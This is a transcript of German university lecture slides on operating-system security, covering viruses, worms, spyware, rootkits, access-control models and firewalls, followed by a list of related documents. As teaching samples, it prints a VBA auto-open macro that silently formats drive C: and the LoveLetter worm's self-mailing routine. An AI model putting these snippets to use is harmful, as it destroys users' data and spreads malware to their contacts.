Schutz und Sicherheit

Größe: px
Ab Seite anzeigen:

Download "Schutz und Sicherheit"

Transkript

1 Schutz und Sicherheit Teil 3 Prof. Dr. Margarita Esponda Freie Universität Berlin WS 2011/2012 1

2 Gegenmaßnahme mit Hardware-Unterstützung Die NX-Bit Abkürzung von No execute-bit ist eine einfache Hardware-Unterstützung zur Verbesserung der Sicherheit eines Computers. Zuerst von AMD mit dem Prozessor Athlon 64 x86-markt eingeführt mit dem Namen Enhanced Virus Protection (EVP) Intel verwendet in seinen neuesten Prozessoren die gleiche Technik mit der Bezeichnung XD-Bit (Execute Disable). Andere Firmen verwenden ähnliche Techniken. Mit dem NX-Bit können Speichersegmente mit Daten von Speichersegmenten mit Programmcode unterschieden werden. Dieser Schutz funktioniert allerdings nur mit Betriebssystemen, die die Unterstützung des NX-Bit ausnutzen. 2

3 Offenlegung von Schwachstellen in Betriebssystemen Apple Linux Sun Solaris Microsoft BSD Quelle: IBM X-Force 3

4 Kritische Schwachstellen in Betriebssystemen Apple Linux Sun Solaris Microsoft BSD Quelle: IBM X-Force 4

5 Warum gibt es so viele Schwachstellen? - Warum schreiben Programmierer unsichere Software? - Zu wenig Kurse über Sicherheit - Sicherheit wird oft in Programmier-Aufgaben nicht erwähnt - C ist eine unsichere Programmiersprache - Programmierer machen sich eher sorgen über andere Probleme - Benutzer machen sich keine Sorgen über Sicherheit - Sicherheit ist teuer und nimmt Zeit in Anspruch - die Firmen wollen Geld sparen 5

6 Viren Ein Computer-Virus ist ein Programm, das sich vervielfältigt, indem es sich an den Code von anderen Programmen anhängt. Viren sind auf Betriebssysteme, Systemarchitektur oder bestimmte Anwendungen spezialisiert Ein virus dropper, der normalerweise ein Trojaner ist, fügt das Virus in das System ein. 6

7 Viren Es gibt eine lange Liste von Virussorten, von denen einige wichtige hier aufgelistet sind: File Boot Macro Source code Polymorphic Encrypted Stealth Tunneling Multipartite Armored 7

8 Datei-Viren Das Virus hängt sich an das Ende einer Datei und ändert den Start des Programms, so dass mit Hilfe eines Sprungbefehls die Ausführung des Programms mit dem neu eingefügten Code anfängt. Nach der Ausführung des Virus- Codes geht die Kontrolle zurück in die normale Ausführung des Programms. Infiziertes Ausführbare- Code Malware 8

9 Bootsektor-Viren Infiziert den Boot-Sektor des Systems und wird jedes Mal ausgeführt, bevor das Betriebssystem geladen wird. Bootsektor-Viren suchen sich weitere Boot-Sektoren (andere Festplatten, Memory-Sticks, usw.), um diese ebenfalls zu infizieren. Auch bekannt als Speicherviren. Zuerst wird der echte Bootsektor auf einen sicheren Platz auf der Platte kopiert. Das Virus kopiert sich selber in dem Bootsektor. 9

10 Bootsektor-Viren Wenn der Computer hochgefahren wird, kopiert sich das Virus selbst im Speicher vorne oder zwischen unbenutzten Interrupt- Vektoren. Diese erste Phase passiert im Kernmodus, bevor das Betriebssystem, die MMU und Antiviren-Programme gestartet werden. Zum Schluss fährt das Virus-Programm das Betriebssystem hoch und bleibt im Speicher. Das Virusprogramm infiziert von da aus alle Speichermedien, die in Sicht kommen. 10

11 Boot-Viren 11

12 Makro-Viren Makroviren werden meistens in interpretierbaren Sprachen geschrieben wie z.b. Visual Basic. Ein Makro ist ein Programm, das in einem Dokument eingebettet ist. Beispiel: Sub AutoOpen() Dim ofs Set ofs = CreateObject( "Scripting.FileSystemObject" ) vs = Shell( "c:command.com /k format c:",vbhide) End Sub Eine überwiegende Anzahl wird in VBA und VBS geschrieben und durch Office- und Staroffice-Dokumente verbreitet. 12

13 Beispiel: Makroviren Das bekannte Melisa-Virus, das am 26. März 1999 gestartet worden ist. Verbreitet sich durch Word-Dokumente, die per gesendet worden sind. Die Word-Dokumente beinhalteten einen VBA-Macro, der aus dem Outlook-Adressbuch neue -Adressen holte und weitere s mit dem infizierten Word-Dokument sendete. Der "ILOVEYOU"-Virus wurde auch in VBS geschrieben und wurde am gestartet. 328 Programmzeilen verursachten $10 Milliarden Schaden. Es ist kein schwieriges Programm gewesen, das vor allem die Vulnerabilität des Windows Betriebssystems zeigte. 13

14 LoveLetter.VBS sub spreadto () for ctrlists = 1 to mapi.addresslists.count set a = mapi.addresslists(ctrlists) x=1 for ctrentries = 1 to a.addressentries.count malead = a.addressentries(x) set male=out.createitem(0) male.recipients.add( malead ) male.subject = ILOVEYOU male.body = kindly check the attached LOVELETTER coming from me. male.attachments.add(dirsystem& \LOVE-LETTER-FOR-YOU.TXT.vbs ) male.send x=x+1 next next end sub 14

15 Viren Source code Sucht nach Quellcode-Programm und verändert diese. Polymorphic Verändert sich, um zu vermeiden, dass Antiviren-Programme diese erkennen. Programmviren haben eine Signatur. Encrypted Um von Antiviren-Programmen unerkannt zu bleiben, sind einige Viren noch Mal verschlüsselt. Vor der Ausführung entschlüsseln sie sich selber. Stealth Versucht das Viruserkennung-System zu verändern. Multipartite Infiziert mehrere Stellen wie Speicher, Boot-Sektors, Dateien und erschwert damit die Erkennung. Armored Besonders schwer zu verstehen, weil dieses Virus manchmal komprimiert oder versteckt hinter Dateiattributen oder Namen ist. 15

16 Viren Gerätetreiberviren Unter Windows und einigen UNIX-Systemen sind Gerätetreiber ausführbare Programme, die auf der Festplatte leben und während des Bootvorgangs geladen werden. Gerätetreiber laufen im Kernmodus und besitzen damit dann alle Möglichkeiten, das System zu beschädigen. Eine wichtige Einschränkung wäre es, Gerätetreiber nur im Benutzermodus laufen zu lassen. 16

17 Quellcode-Viren Plattformunabhängig Sucht nach C-Quellprogrammen Die Zeile #include <virus.h> wird eingefügt. Um den Virus zu aktivieren, muss noch eine richtige Stelle gefunden werden, um die Startfunktion aufzurufen. start_virus(); 17

18 Polymorphe Viren Beispiel: X = ( A+B+C-4 ) Quelle: Tanenbaum 18

19 Würmer Computerwürmer sind selbstreplizierende Programme, die sich über das Netz verbreiten und damit größeren Schaden anrichten können. Sie verbreiten sich meistens schneller als Viren, weil sie sich selbst fortbewegen können. 19

20 Würmer Beispiel: von Robert Tappan Morris Zwei Programme: Ladeprogramm und eigentliches Wurmprogramm. Das Ladeprogramm (99 Zeilen C-Programm), von angegriffenen Systemen übersetzt und ausgeführt, baute eine Verbindung zum Stammrechner und holte dann das Wurmprogramm. Das Wurmprogramm durchsuchte die Routing-Tabellen, und versuchte, in neuen Maschinen das Ladeprogramm zu verbreiten. 20

21 Würmer 3 Methoden wurden für die Verbreitung des Ladeprogramms verwendet: rsh-schell, Finger-Daemon (Pufferüberlauf) sendmail (Debugging-Hintertür) Das Wurmprogramm selber versuchte Benutzer-Logins zu knacken in einem 3-stufigen Suchverfahren: - einfache Fälle ohne Passwort - Wörterbuch mit den 432 beliebtesten Passwörtern - jedes Wort aus dem standard-unix-on-line Wörterbuch Das ermöglichte es dem Wurm, weitere Maschinen zu infizieren. 21

22 Der Morris-Internet-Wurm Der Wurm prüfte in jeder neu eroberten Maschine, ob dort bereits ein Wurm lief und in 6 von 7 Fällen unterbrach er seine Ausführung selbst. Das Verhältnis (1:7) führte zu einer Wurmüberschwemmung, die viele Maschinen zum Stillstand brachte Rechner wurden überfallen. Das waren 10% der damaligen vernetzten Rechner. Morris wurde verurteilt, bekam eine Geldstrafe von Dollar, 3 Jahre auf Bewährung, und die Prozesskosten beliefen sich auf mehr als Dollar. 22

23 Der Morris-Internet-Wurm 23

24 Adware 24

25 Adware - enthält Code, der persönliche Informationen des Benutzers überwacht - die Internet-Verbindung des Benutzers wird im Hintergrund missbraucht, indem mit Hilfe von sogenannten "Back channels" persönliche Information gesendet wird. - Legal? oder Illegal? Adware ohne ausdrückliche Zustimmung des Benutzers = Spyware illegal 25

26 Schnüffelprogramme (Spyware) Definition von Barwinski et al. (2006) Versteckt sich, so dass das Opfer sie nicht leicht finden kann Sammelt Daten über den Benutzer (z.b. besuchte Websites, Passwörter, Kreditkartennummer, usw.) Sendet die gesammelte Information an ihre Urheber Es ist oft sehr schwierig aus dem System zu eliminieren 26

27 nach Barwinski et al. (2006) Spyware 3 Kategorien von Spyware: Marketing sammelt Information, um gezielte Werbung zu erzeugen. Überwachung von Unternehmen verwendet, um Angestellte zu überwachen. Malware Zombie-Prozesse liegen auf der Lauer, um Benutzerinformation zu missbrauchen. Hauptlieferanten: Unterhaltung für Erwachsene, Warez (illegal beschaffte Software), Online-Reisen und Immobilien 27

28 Spyware Moshchuk et al Millionen URLs wurden untersucht 6% hatten Spyware nach Studie von AOL/NSA sind 80% der PCs überfallen mit durchschnittlich 93 einzelnen Spyware-Programmen pro Rechner viel größere Infektionsrate durch Websites mit pornografischem Inhalt, kostenloser Software, Software zum Austauschen von Dateien in Peer-2-Peer-Netzwerken, usw. 28

29 Spyware Google Studie 2007 in-depth Analysis von 4,5 Milliarden Websites Der Anteil potenziell gefährlicher Websites in den Google- Trefferlisten ist demnach seit April 2007 von unter 0,4 Prozent auf mehr als 1,5 Prozent im Dezember gestiegen. Der Trend zeigt nach oben (nach Niels Provos). Immer mehr legitime Websites werden gehackt und als Malware- Schleudern missbraucht. Die Täter nutzen dabei jede sich bietende Sicherheitslücke aus. Schwachstellen gibt es überall, z.b. PHP-Anwendungen, Datenbanken, Content-Management-Systemen (CMS) oder Blog- Software. 29

30 Schnüffelprogramme (Spyware)... Google Studie ist nicht mehr die Hauptquelle von Malware, sondern Websites. 4 Verbreitungsmechanismen Infizieren von Webservern Webseiten mit Benutzerbeteiligung Eingefügte Werbung Third-party widgets Skriptsprachen (Javascript, VBScript, usw.) werden verwendet, um zuerst die Angreifbarkeit eines Rechners herauszufinden. Diese Information wird dann an Server weitergeleitet, um passende Angreifer zu fordern. Bot-Netze und Techniken, um sich vor Antiviren-Software zu verstecken. 30

31 Port Scanning Wird verwendet, um Angriffsstellen zu finden. Es gibt eine Reihe von Tools, die eine Untermenge der typischen Programmierfehler und Schwachstellen in einem System untersucht. nmap Nessus Bei Angreifern und Administratoren sehr beliebt. 31

32 Rootkits Eine Sammlung von Programmen und Dateien, die versucht, ihre Existenz zu verbergen. Das Rootkit enthält Malware, oder Hintertüren, die ebenfalls versteckt werden. Sorten von Rootkits - Hypervisor eine virtuelle Maschine als Rootkit - Speicher existieren nur im Arbeitsspeicher des laufenden Systems - Kern ersetzt Teile des Betriebssystemkerns - Bibliothek versteckt sich in Bibliothekprogrammen (DLLs) - Anwendung versteckt sich in modifizierten Systemprogrammen - Firmware durch ein BIOS-Reflash oder Manipulation des ACPI - Advanced Configuration and Power Interface 32

33 Rootkits Erstaunlich viele Firmen verwenden Rootkits als Kopierschutz von ihren Produkten Sony BMG, XCP Extended Copy Protection für Musik-CDs verwendete ein Rootkits, der sich in Windows-Systemen installierte. USB-Stick mit Finger-Abdruckleser von Sony versteckte ein Rootkit in Windows-Verzeichnissen. Kinowelt verkauft DVDs mit einem Kopierschutz, der unter Windows ein Rootkit zum Verstecken von Prozessen installiert. Die Firma EA hat in ihrem Spiel Spore im DRM-Paket des Programms ein Rootkit, um den Kopierschutz mit Online- Authentifizierung zu verbergen. 33

34 2005. Sony BMG Das Sony-Rootkit auroruninf-datei in ca. 20 Millionen CDs, die ein 12 MB-Rootkit in den Rechnern installierte um die Musik zu hören, mussten die Benutzer eine Lizenzvereinbarung akzeptieren. Dabei wurde das Rootkit installiert, unabhängig davon, ob die Lizenz akzeptiert worden war oder nicht Eine Reihe von $sys$-dateien wurden installiert und eine davon war ein Filter, der alle CD-ROM-Systemaufrufe abhörte und alle Musikprogramme außer dem Sony-Programm verbot. Der Rootkit überwachte Hörangewohnheiten von Benutzern und sendete die Information an Sony. Ein fehlerhafter Verbergungsmechanismus löschte alle Einträge, die mit $sys$ begannen. Ein Deinstallationsprogramm mit technischen Fehlern hinterließ angriffsanfällige Rechner. Teilweise Code aus Open-Source 34

35 Rootkits Verstecke Anwendung Anwendung Anwendung Anwendung Anwendung System- Bibliothek System- Bibliothek System- Bibliothek System- Bibliothek System- Bibliothek Betriebssystem Betriebssystem Hypervisor Betriebssystem Betriebssystem Betriebssystem HW (BIOS) HW (BIOS) HW (BIOS) HW (BIOS) HW (BIOS) 35

36 Multilevel-Sicherheit DAC Discretionary Access Control Die meisten Betriebssysteme bieten eine benutzerbestimmbare Zugriffskontrolle (DAC) Nicht ausreichend an Stellen, wo stärkere Sicherheit notwendig wird, z.b. Krankenhäuser, Polizei, Patentanmeldung, usw. Lösung: MAC Mandatory Access Control. Systembestimmbare Zugriffskontrolle MAC-Mechanismen kontrollieren den Informationsfluss 36

37 Das Bell-LaPadula-Modell Am meisten verbreitetes Multilevel-Sicherheitsmodell Von Bell und LaPadula in Jahr 1973 vorgeschlagen Für Militärische Sicherheit entwickelt Dokumente (Objekte) haben Sicherheitsstufen z.b. nicht klassifiziert vertraulich geheim streng geheim Benutzer bekommen dieselben Sicherheitsstufen zugeordnet Benutzer haben je nach zugeordneten Sicherheitsstufen verschiedene Zugriffsrechte auf die Dokumente. 37

38 Das Bell-LaPadula-Modell Regeln für den Informationsfluss 1. Simple-Security-Regel Ein Prozess, der auf Sicherheitsstufe k läuft, kann nur Objekte mit der Sicherheitsstufe k oder niedriger lesen. 2. *-Regel Ein Prozess, der auf Sicherheitsstufe k läuft, kann nur auf Objekte auf seiner oder einer höheren Stufe schreiben. Prozesse dürfen nach unten lesen und nach oben schreiben. 38

39 Sicherheitsstufe Das Bell-LaPadula-Modell Prozess 4 Schreiben 3 Objekt 2 Lesen 1 niedrigste Priorität-Stufe 39

40 Das Bell-LaPadula-Modell Die Information kann nur horizontal oder aufwärts fließen Jedem Benutzer bekommt eine Sicherheitsstufe zugewiesen. Diese Stufe wird zusammen mit anderen benutzerspezifischen Daten wie UID oder GID gespeichert. Beim Login bekommt die Shell des Benutzers diese Sicherheitsstufe und kann an Kinderprozesse vererbt werden. Prozesse können Dateien nicht öffnen, die zu einer größeren Sicherheitsstufe gehört. Das Bell-LaPadula-Modell ist für das Bewahren von Geheimnissen geeignet. 40

41 Das Biba-Modell Das Bell-LaPadula-Modell ist nicht dafür entwickelt, um die Integrität der Daten zu garantieren. Wir benötigen dafür ein Modell, das genau die umgekehrten Eigenschaften hat. 1. Simple-Integrity-Regel Ein Prozess, der auf Sicherheitsstufe k läuft, kann nur auf Objekte seiner oder einer niedrigeren Stufe schreiben. 2. Integrity-*Regel Ein Prozess, der auf Sicherheitsstufe k läuft, kann nur Objekte seiner oder einer höheren Stufe lesen 41

42 Authentifizierung Der meist verwendete Authentifizierung-Mechanismus wird durch die Aufforderung vom Login-Namen und Passwort realisiert. Das Passwortsystem ist die erste Verteidigung gegen Angreifer. Die Login-ID wird für die DAC Discretionary Access Control verwendet Der Eigentümer eines Objekts bestimmt, welche Rechte andere Benutzer über das Objekt haben. 42

43 Authentifizierung 43

44 Schwachstellen von Passwortsystemen Passworte können oft leicht geraten werden mit einer Liste typischer Passworte Morris und Thompson erstellten (1979) eine Liste von wahrscheinlichen Passwörtern - Vornamen, Nachnamen, - Straßen, Städte, - ein mittelgroßes Wörterbuch, - Autokennzeichen, - rückwärts geschriebene Wörter und - kurze Ketten zufälliger Buchstaben. Mehr als 86% aller Passwörter waren in der Liste Ähnliche Ergebnisse von Klein 1990 Andere Studie (Kabay 1997) konnte 82% Passwörter erraten 44

45 Schwachstellen von Passwortsystemen Das Wachstumm des Webs vergrößert das Problem, zeigt eine Studie von Florencio und Herley Jede Person muss immer mehr Passwörter auswendig lernen. Diese Überforderung führ zu einfachen und schwächeren Passwörtern. Das Internet ist zu einer unglaublichen Beute geworden. 45

46 Abwehrmechanismen Defense-in-Depths-Strategie mehrere Sicherheitsschichten Firewalls Zwei Varianten: Hardware und Software In einem Webserver kontrolliert die Firewall, dass die Kommunikation nur mittels http stattfindet. Hier hätte den Morris-Wurm nicht durchgehen können. Mit Hilfe von Firewalls können verschiedene Sicherheits-Domänen definiert werden. 46

47 Firewall Demilitarized Zone Bildquelle: Silverschatz, Galvin und Gagne 47

48 Abwehrmechanismen Hardware-Firewalls Zustandslose Header jedes kommenden Pakets werden untersucht Quell- und Ziel-IP-Adresse, Quell- und Zielports Art des Dienstes und des Protokolls Apache-Webserver sind trotz Firewalls angreifbar Zustandsbehaftete Verfolgen Verbindungen Angriffserkennungssystem (Intrusion Detection System IDS) Inhalte von Paketen werden auch untersucht Software-Firewalls Filter innerhalb des Betriebssystemkerns, die prinzipiell das gleiche wie Hardware-Firewall leisten 48

49 Firewall Probleme: Tunneling unerlaubtes Protokoll innerhalb erlaubtem Protokoll (z.b. telnet innerhalb von HTTP) IP-Spoofing Das Versenden von IP-Paketen mit gefälschter Absender-IP-Adresse 49

50 Firewall Bridging-Firewall Routing-Firewall Proxy-Firewall Personal firewall oder Desktop Firewall Application proxy firewall führt weitere Prüfungen zur Zugriffssteuerung und Protokollfunktionen System-call firewall Alle wichtige Systemaufrufe werden überwacht 50

Systeme 1. Kapitel 10 Sicherheit WS 2009/10 1

Systeme 1. Kapitel 10 Sicherheit WS 2009/10 1 Systeme 1 Kapitel 10 Sicherheit WS 2009/10 1 IBM System Storage-Kompendium Die IBM Speichergeschichte von 1952 bis 2010 http://www-03.ibm.com/systems/data/flash/de/resources/ ibm_storage_compendium_de.pdf

Mehr

Computerviren, Würmer, Trojaner

Computerviren, Würmer, Trojaner Computerviren, Würmer, Trojaner Computerviren, Würmer und Trojaner zählen zur Familie unerwünschter bzw. schädlicher Programme, der so genannten Malware. Diese Programme können sich selbst verbreiten und

Mehr

Sicherheitsaspekte unter Windows 2000

Sicherheitsaspekte unter Windows 2000 Sicherheitsaspekte unter Windows 2000 Margarete Kudak Sascha Wiebesiek 1 Inhalt 1. Sicherheit 1.1 Definition von Sicherheit 1.2 C2 - Sicherheitsnorm 1.3 Active Directory 2. Sicherheitslücken 3. Verschlüsselung

Mehr

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1 Sicherheit Bedeutung Gefahren Mag. Friedrich Wannerer 1 Sicherheitsbegriff Unversehrtheit und Vertraulichkeit persönlicher Daten Datenschutzgesetz 2000 Bedrohungen q Dialer, Spam, Spyware, Viren, Würmer,

Mehr

Aktuelle Themen der Informatik Daniel Renoth CN 8

Aktuelle Themen der Informatik Daniel Renoth CN 8 HFU Furtwangen Aktuelle Themen der Informatik Daniel Renoth CN 8 Agenda 1. Definition Rootkit? 2. Historie 3. Szenario 4. Funktionalität 5. Arten von Rootkits HFU Furtwangen - Aktuelle Themen der Informatik

Mehr

Viren, Würmer, Trojaner

Viren, Würmer, Trojaner Viren, Würmer, Trojaner Was muss ich beachten? Ralf Benzmüller G DATA Software AG Überblick Einleitung Grundlegende Begriffe Gefahrensituation Zahlen und Daten Trends Infektionsmechanismen Viren Würmer

Mehr

Malware - Viren, Würmer und Trojaner

Malware - Viren, Würmer und Trojaner Department of Computer Sciences University of Salzburg June 21, 2013 Malware-Gesamtentwicklung 1984-2012 Malware-Zuwachs 1984-2012 Malware Anteil 2/2011 Malware Viren Würmer Trojaner Malware Computerprogramme,

Mehr

Computerviren. Institut fr Computerwissenschaften. Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac.

Computerviren. Institut fr Computerwissenschaften. Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac. Computerviren Mihajlovic Roland rmihajlo@cosy.sbg.ac.at Reischmann Stefan sreisch@cosy.sbg.ac.at Institut fr Computerwissenschaften Computerviren p.1/18 Der I LOVE YOU Virus Computerviren p.2/18 Geschichte

Mehr

Aufgabe 3 Storm-Worm

Aufgabe 3 Storm-Worm Aufgabe 3 Storm-Worm Bot: kompromittierte Maschine Kommunikationskanal, der dem Angreifer die Kontrolle über den Bot und somit das System gestattet Botnetz: Zusammenschluss mehrerer Bots koordinierte Distributed-Denial-Of-Service-Angriffe

Mehr

Verbreitete Angriffe

Verbreitete Angriffe Literatur Verbreitete Angriffe Univ.-Prof. Dr. Christoph Meinel Hasso-Plattner-Institut Universität Potsdam, Deutschland DoS und DDoS Angriffe (1/2) 2 Denial-of-Service Angriff mit dem Ziel der Störung

Mehr

ELIT2012: Security. Security: Potentielle Gefahren und Gegenmaßnahmen

ELIT2012: Security. Security: Potentielle Gefahren und Gegenmaßnahmen ELIT2012: Security Security: Potentielle Gefahren und Gegenmaßnahmen Gefahrenquellen Brute-Force-Logins Scans Exploits Malware: Viren, Würmer, Trojaner Website-Hijacking DOS, DDOS Gefahrenquellen Internet

Mehr

PCtipp; IDG COMMUNICATIONS. Im Internet: Computeria Zürich 1

PCtipp; IDG COMMUNICATIONS. Im Internet: Computeria Zürich 1 PCtipp; IDG COMMUNICATIONS Im Internet: 13.04.2011 Computeria Zürich 1 Vortrag von Werner Züst Inhaltsangabe 1. Ursprünge und Begriffe 2. Aktuelle Situation am Beispiel eines Experimentes 3. Empfohlen

Mehr

Viren, Würmer und Trojaner

Viren, Würmer und Trojaner von Daniel Borgmann PING e.v. Weiterbildungsveranstaltungen http://www.ping.de/ Inhaltsverzeichnis 1. Was ist ein Virus eigentlich? 2. Wie fing das alles an? 3. Wie kann sich mein Computer infizieren?

Mehr

Computersicherheit & Passwörter

Computersicherheit & Passwörter 1 1. Malware Spuren - Sobald der Rechner eine Online-Verbindung herstellt, empfängt und sendet er Daten und hinterlässt Spuren. Begriff - Malware ist der Oberbegriff für Software, die dem Anwender schaden

Mehr

MALWARE AM BEISPIEL VON STUXNET

MALWARE AM BEISPIEL VON STUXNET MALWARE AM BEISPIEL VON STUXNET IAV10/12 24.05.2011 Jan Heimbrodt Inhalt 1. Definition Was ist Malware? 2. Kategorisierung von Malware Viren, Würmer, Trojaner, 3. Was macht Systeme unsicher? Angriffsziele,

Mehr

9.3 Firewalls. HW/SW-System, oft auf separatem Rechner (oder mehreren Rechnern),

9.3 Firewalls. HW/SW-System, oft auf separatem Rechner (oder mehreren Rechnern), 9.3 Firewalls (firewall = Brandmauer) Firewall: HW/SW-System, oft auf separatem Rechner (oder mehreren Rechnern), typischerweise an der Übergangsstelle zwischen einem Teilnetz und dem Rest des Internet

Mehr

Intrusion Detection Basics

Intrusion Detection Basics Intrusion Detection Basics Ziele von Angriffen Formen von Angriffen Vorgehensweise von Eindringlingen Überwachungsmöglichkeiten Tools: tripwire, iptraf, tcpdump, snort Ziele von Angriffen (Auswahl) Sport:

Mehr

ProSecure Sales Training 4/6. Vielseitige Verteidigung des SMB

ProSecure Sales Training 4/6. Vielseitige Verteidigung des SMB ProSecure Sales Training 4/6 Vielseitige Verteidigung des SMB Vielseitige Verteidigung Firewall / Verbindungs-Screening (Hacking, Angreifer, DoS-Attacken ) Virus- / Malware-Scanning (Vermischte Gefahren,

Mehr

Daten-schützen.ppt, Andreas Schneider, 2011-12-06, Page 1 of 27

Daten-schützen.ppt, Andreas Schneider, 2011-12-06, Page 1 of 27 Daten-schützen.ppt, Andreas Schneider, 2011-12-06, Page 1 of 27 Agenda Warum wird das Thema Sicherheit immer wichtiger? Welche Arten von Sicherheitsrisiken gibt es? Welche Arten von Verschlüsselung gibt

Mehr

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte

Personal Firewall (PFW) und Virenscanner. Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Personal Firewall (PFW) und Virenscanner Präsentation von Gunawati A.-Tillmann, Miguel Lopez und Andreas Angelkorte Gliederung Personal Firewall Virenscanner 1. Zweck einer Firewall 2. Funktionsweise einer

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

DocuWare unter Windows 7

DocuWare unter Windows 7 DocuWare unter Windows 7 DocuWare läuft unter dem neuesten Microsoft-Betriebssystem Windows 7 problemlos. Es gibt jedoch einige Besonderheiten bei der Installation und Verwendung von DocuWare, die Sie

Mehr

DesktopSecurity. Schutz für den Windows-Arbeitsplatz PCs, Workstations und Laptops gegen Bedrohungen aus dem Internet

DesktopSecurity. Schutz für den Windows-Arbeitsplatz PCs, Workstations und Laptops gegen Bedrohungen aus dem Internet DesktopSecurity Schutz für den Windows-Arbeitsplatz PCs, Workstations und Laptops gegen Bedrohungen aus dem Internet Ralf Niederhüfner PROLINK internet communications GmbH 1 Desktop Security Szenarien

Mehr

IT-Sicherheit in Werbung und. von Bartosz Komander

IT-Sicherheit in Werbung und. von Bartosz Komander IT-Sicherheit in Werbung und Informatik von Bartosz Komander Gliederung Einführung Anti-viren-software Verschlüsselungssoftware Firewalls Mein Fazit Quellen 2 Einführung Was ist eigentlich IT-Sicherheit?

Mehr

Gefahren und Lästiges aus dem Internet

Gefahren und Lästiges aus dem Internet couniq consulting GmbH Internet & E-Business Gefahren und Lästiges aus dem Internet Referat Kiwanis Club Belp-Gürbetal 20. Juli 2004 Patrik Riesen 1 Wurm Mydoom bricht Rekorde: 38,5 Milliarden Dollar Schaden?

Mehr

Präsentation IKS. Desktop Personal Firewall (DPF) Virenscanner

Präsentation IKS. Desktop Personal Firewall (DPF) Virenscanner Präsentation IKS Desktop Personal Firewall (DPF) Virenscanner Was ist eine Desktop Personal Firewall (DPF)? Software zum filtern von ein- und ausgehendem Datenverkehrs eines PC s Dient zum Schutz des Computers

Mehr

Sun/Oracle Java Version: 1.6.0, neuer als 1.6.0_11

Sun/Oracle Java Version: 1.6.0, neuer als 1.6.0_11 Systemanforderungen für EnlightKS Online Certification Management Services ET2.13 Juni 2011 EnlightKS Candidate, EnlightKS TestStation Manager, EnlightKS Certification Manager Betriebssystem: Microsoft

Mehr

Gesamtübung für das Modul Sicherheit

Gesamtübung für das Modul Sicherheit Gesamtübung für das Modul Sicherheit Kreuzen Sie bei den folgenden Fragen jeweils die richtige Antwort an: 1. Was bedeutet Cracking? Daten hacken, um Sicherheitslücken aufzuzeigen Zugriffsbarrieren mit

Mehr

Compliance mit dem IEM Endpoint Manager durchsetzen

Compliance mit dem IEM Endpoint Manager durchsetzen Compliance mit dem IEM Endpoint Manager durchsetzen PPPvorlage_sxUKMvo-05.00.potx santix AG Mies-van-der-Rohe-Straße 4 80807 München www.santix.de santix AG 2 Sicherheit in der IT Was bedeutet Sicherheit

Mehr

Handbuch ECDL 2003 Basic Modul 2: Computermanagement und Dateiverwaltung Grundbegriffe: Viren und Daten auf Viren prüfen

Handbuch ECDL 2003 Basic Modul 2: Computermanagement und Dateiverwaltung Grundbegriffe: Viren und Daten auf Viren prüfen Handbuch ECDL 2003 Basic Modul 2: Computermanagement und Dateiverwaltung Grundbegriffe: Viren und Daten auf Viren prüfen Dateiname: ecdl2_06_01_documentation_standard.doc Speicherdatum: 14.02.2005 ECDL

Mehr

Rechnerarchitekturen und Betriebssysteme (CS201): Sicherheit: ACM und Passworte, OS-Timeline

Rechnerarchitekturen und Betriebssysteme (CS201): Sicherheit: ACM und Passworte, OS-Timeline Rechnerarchitekturen und Betriebssysteme (CS201): Sicherheit: ACM und Passworte, OS-Timeline 12. Dezember 2014 Prof. Dr. Christian Tschudin Departement Mathematik und Informatik, Universität Basel Wiederholung

Mehr

1 Trojanische Pferde (2)

1 Trojanische Pferde (2) E Angriffskonzepte, Systemschwachstellen E Angriffskonzepte, Systemschwachstellen Angriff: nicht-autorisierter Zugriff auf ein System Abwehrmaßnahmen Authentisierung von Benutzern abgesicherte Kommunikation

Mehr

KASPERSKY SECURITY FOR VIRTUALIZATION 2015

KASPERSKY SECURITY FOR VIRTUALIZATION 2015 KASPERSKY SECURITY FOR VIRTUALIZATION 2015 Leistung, Kosten, Sicherheit: Bessere Performance und mehr Effizienz beim Schutz von virtualisierten Umgebungen AGENDA - Virtualisierung im Rechenzentrum - Marktübersicht

Mehr

ENDPOINT SECURITY FOR MAC BY BITDEFENDER

ENDPOINT SECURITY FOR MAC BY BITDEFENDER ENDPOINT SECURITY FOR MAC BY BITDEFENDER Änderungsprotokoll Endpoint Security for Mac by Bitdefender Änderungsprotokoll Veröffentlicht 2015.03.11 Copyright 2015 Bitdefender Rechtlicher Hinweis Alle Rechte

Mehr

Sophos Virenscanner Konfiguration

Sophos Virenscanner Konfiguration Ersteller/Editor Ulrike Hollermeier Änderungsdatum 12.05.2014 Erstellungsdatum 06.07.2012 Status Final Konfiguration Rechenzentrum Uni Regensburg H:\Sophos\Dokumentation\Sophos_Konfiguration.docx Uni Regensburg

Mehr

Inhaltsverzeichnis Abbildungsverzeichnis

Inhaltsverzeichnis Abbildungsverzeichnis Inhaltsverzeichnis Abbildungsverzeichnis... 1 1 Eigener lokaler Webserver... 2 1.1 Download der Installationsdatei... 2 1.2 Installation auf externer Festplatte... 2 1.3 Dienste starten... 5 1.4 Webserver

Mehr

Systemempfehlungen Sage HWP

Systemempfehlungen Sage HWP Rocongruppe Systemempfehlungen Sage HWP Robert Gabriel http://www.hwp-software.de Inhalt Einzelplatzrechner:... 2 Thema Microsoft Office... 3 Server/Netzwerke... 3 Hinweis SBS Server mit Exchange... 4

Mehr

MySQL Community Server 5.6 Installationsbeispiel (Ab 5.5.29)

MySQL Community Server 5.6 Installationsbeispiel (Ab 5.5.29) MySQL Community Server 5.6 Installationsbeispiel (Ab 5.5.29) Dieses Dokument beschreibt das Herunterladen der Serversoftware, die Installation und Konfiguration der Software. Bevor mit der Migration der

Mehr

Analyse der Entwicklung von Malware

Analyse der Entwicklung von Malware TU Darmstadt schmid@vwl.tu-darmstadt.de 1. Kryptowochenende 01.07.2006 Gliederung 1 Chronologische Betrachtung Übersicht über die Eigenschaften der Viren 2 3 4 Die Motivation Definitionen Chronologische

Mehr

